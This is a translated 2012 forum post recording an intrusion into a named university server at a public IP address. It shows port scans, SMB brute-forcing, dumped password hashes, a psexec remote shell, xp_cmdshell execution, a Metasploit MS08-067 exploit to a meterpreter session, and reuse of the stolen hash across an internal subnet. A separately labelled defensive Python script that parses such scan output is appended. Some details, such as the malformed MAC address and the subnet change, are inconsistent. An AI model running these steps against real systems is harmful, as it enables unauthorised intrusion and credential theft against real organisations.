nmap + msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241    // use the script to scan for the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241    // view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241    // obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and execute a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the ms08-067 vulnerability against the target machine from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254    // try logging into the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack ~~
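As an added example, not part of the original post, the following Python script parses the "Host script results" block that smb-enum-shares, smb-brute and smb-check-vulns print in the format shown above and lists the weaknesses a defender would need to fix (anonymous share access, accounts that accept blank or dictionary passwords, missing patches); the sample report is constructed to mirror that format, not captured from any host.

```python
import re

# Constructed sample in the shape nmap 5.x prints for the three NSE scripts
# used in the post (not captured from any real host).
SAMPLE_REPORT = """\
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

LOGIN_RE = re.compile(r"(\S+?):(\S*) => Login was successful")
VULN_RE = re.compile(r"(MS\d{2}-\d{3}): VULNERABLE")


def audit_smb_report(report: str) -> list[str]:
    """Walk the '|'-prefixed tree nmap prints and collect items to remediate."""
    findings = []
    script = None   # NSE script whose section we are currently inside
    share = None    # current share name while inside smb-enum-shares
    for raw in report.splitlines():
        stripped = raw.lstrip("|_ ")
        depth = len(raw) - len(stripped)      # indentation under the '|' gutter
        line = stripped.rstrip()
        if depth == 2 and line.endswith(":"):  # "| smb-brute:" opens a section
            script = line[:-1]
            continue
        if script == "smb-enum-shares":
            if depth == 4:                     # share name line, e.g. "|   IPC$"
                share = line
            elif line.startswith("Anonymous access:"):
                level = line.split(":", 1)[1].strip()
                if level != "<none>":          # a null session can reach the share
                    findings.append(f"share {share} allows anonymous {level} access")
        elif script == "smb-brute":
            m = LOGIN_RE.match(line)
            if m:
                user, secret = m.groups()
                kind = "blank" if secret == "<blank>" else "dictionary"
                findings.append(f"account {user} accepted a {kind} password over SMB")
        elif script == "smb-check-vulns":
            m = VULN_RE.match(line)
            if m:
                findings.append(f"host is missing the patch for {m.group(1)}")
    return findings
```

Running `audit_smb_report` over a real report feeds the same four remediation items (close the null session on IPC$, set passwords on the two accounts, apply MS08-067) into a ticket instead of leaving them buried in scan output.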